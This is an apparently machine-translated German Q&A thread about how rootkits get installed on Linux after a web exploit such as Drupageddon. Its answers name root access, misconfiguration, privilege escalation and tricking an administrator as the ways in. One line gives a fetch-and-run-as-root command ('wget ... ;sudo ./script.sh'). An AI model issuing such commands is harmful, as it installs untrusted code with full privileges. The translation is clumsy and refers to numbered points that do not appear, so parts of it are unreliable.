Ich habe einige Beiträge zum Suchen nach Rootkits gesehen, konnte jedoch keine Informationen darüber finden, wie sie auf ein Linux-System gelangen. Insbesondere wenn Sie einen Fehler in einer PHP-Website ausnutzen (ja, ich spreche hier von Drupageddon ), ist es möglich, ein Rootkit zu installieren, obwohl Sie nur als Webserver (www-data) und nicht als root ausgeführt werden können. Die wenigen Informationen, die ich darüber gefunden habe, wie diese installiert werden, legen nahe, dass Sie root sein müssen, um sie zu installieren (siehe hier ).
11
wget http://mydomain/script.sh;sudo ./script.sh
Antworten:
Wenn ich es wäre, würde ich die folgende Methode anwenden:
Zu # 1: Ein Benutzer sollte unter Linux niemals zufällige Software herunterladen. Verwenden Sie die entsprechenden Kanäle (Ubuntu Software Center), um Software zu installieren. Wenn es sich um Software handelt, die außerhalb der entsprechenden Kanäle heruntergeladen werden muss, stellen Sie sicher, dass die Quelle des Downloads vertrauenswürdig ist. Denken Sie an die neuesten Versionen von Apache-Software oder MySQL. Laden Sie keine zufällige Software herunter, ohne verschiedene soziale Medien über die Integrität dieser Anwendung zu informieren. Microsoft hat niemals Software zentralisiert. Es führte dazu, dass sich viele Leute mit Software beschäftigten, so dass ihre Benutzerbasis groß war, aber das machte es auch einfach, in Computer einzusteigen und Daten zu sammeln, die sie verkaufen können.
Zu # 2: schwerwiegender Benutzerfehler. Geben Sie niemals Ihr Administratorkennwort ein, es sei denn, Sie wissen, warum es gefragt wird.
quelle
Ja, im Allgemeinen sind Root-Berechtigungen erforderlich, um ein Rootkit zu installieren. Viele der Rootkits enthalten ein Modul, das in den Kernel geladen wird, ein anderes Tool zum Überschreiben, das normalerweise von root verwendet wird. In einem richtig eingestellten und perfekten System gibt es keine Möglichkeit, das Root-Kit ohne Root-Rechte zu installieren, aber ...
... es kann Probleme mit der Systemkonfiguration geben, die das System unsicher machen. ... es kann Sicherheitslücken geben, die eine Erhöhung von Berechtigungen ermöglichen ... es kann Möglichkeiten geben, einen Benutzer mit Root-Berechtigungen dazu zu bringen, etwas Böses auszuführen.
Die Wege sind so unbegrenzt wie die Vorstellungskraft des Eindringlings.
quelle